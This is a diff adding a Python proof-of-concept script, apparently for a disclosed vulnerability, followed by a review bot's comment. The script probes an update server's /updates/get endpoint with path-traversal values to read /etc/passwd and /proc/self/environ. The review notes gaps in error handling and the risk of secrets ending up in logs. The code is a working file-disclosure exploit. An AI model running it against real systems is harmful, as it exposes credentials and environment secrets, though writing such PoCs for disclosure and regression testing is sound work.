diff --git a/rosetta-sdu-2026-0000/poc2.py b/rosetta-sdu-2026-0000/poc2.py
new file mode 100644
index 0000000..cf5511c
--- /dev/null
+++ b/rosetta-sdu-2026-0000/poc2.py
@@ -0,0 +1,39 @@
+import sys
+import json
+from urllib.request import urlopen
+from urllib.parse import urlencode
+from urllib.error import URLError
+
+u = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
+u = u.rstrip("/")
+t = ["etc/hostname", "etc/passwd", "proc/1/cmdline", "proc/self/environ", "proc/cpuinfo"]
+
+for d in range(1, 11):
+ up = "/".join([".."] * d)
+ for f in t:
+ a = f"{up}/{f}"
+ params = urlencode({
+ "platform": "android",
+ "arch": a,
+ "app": "1.0.0",
+ "kernel": "0.0.0"
+ })
+ try:
+ r = urlopen(f"{u}/updates/get?{params}", timeout=5)
+ data = json.loads(r.read())
+ except (URLError, ValueError):
+ continue
+
+ k = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
+ kurl = data.get("kernelUrl") or data.get("kernel_url")
+ if k and kurl and ".." in kurl:
+ print(f"Found: {kurl}")
+ try:
+ c = urlopen(u + kurl, timeout=5).read().decode("utf-8", errors="replace")
+ print(c[:1000])
+ except URLError:
+ print("Download failed")
+ sys.exit(0)
+
+print("Not vulnerable")
+sys.exit(1)
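Review bot: The closing `print("Not vulnerable")` / `sys.exit(1)` is also reached when every request failed, because `except (URLError, ValueError): continue` treats an unreachable host or a non-JSON reply the same as a clean negative; run as a regression check after a fix, that yields a false all-clear. Record success with `got_reply = True` right after `json.loads(r.read())` and finish with `print("Not vulnerable" if got_reply else "Inconclusive: no valid response")` plus a distinct exit code for the inconclusive case. A JSON body that is not an object makes `data.get` raise AttributeError, and a timeout during `r.read()` may surface as TimeoutError rather than URLError, so either one aborts the run with a traceback instead of a verdict. `print(c[:1000])` can copy the contents of `proc/self/environ` into a terminal or CI log; printing the byte length or a digest would confirm the finding without writing secrets to the log.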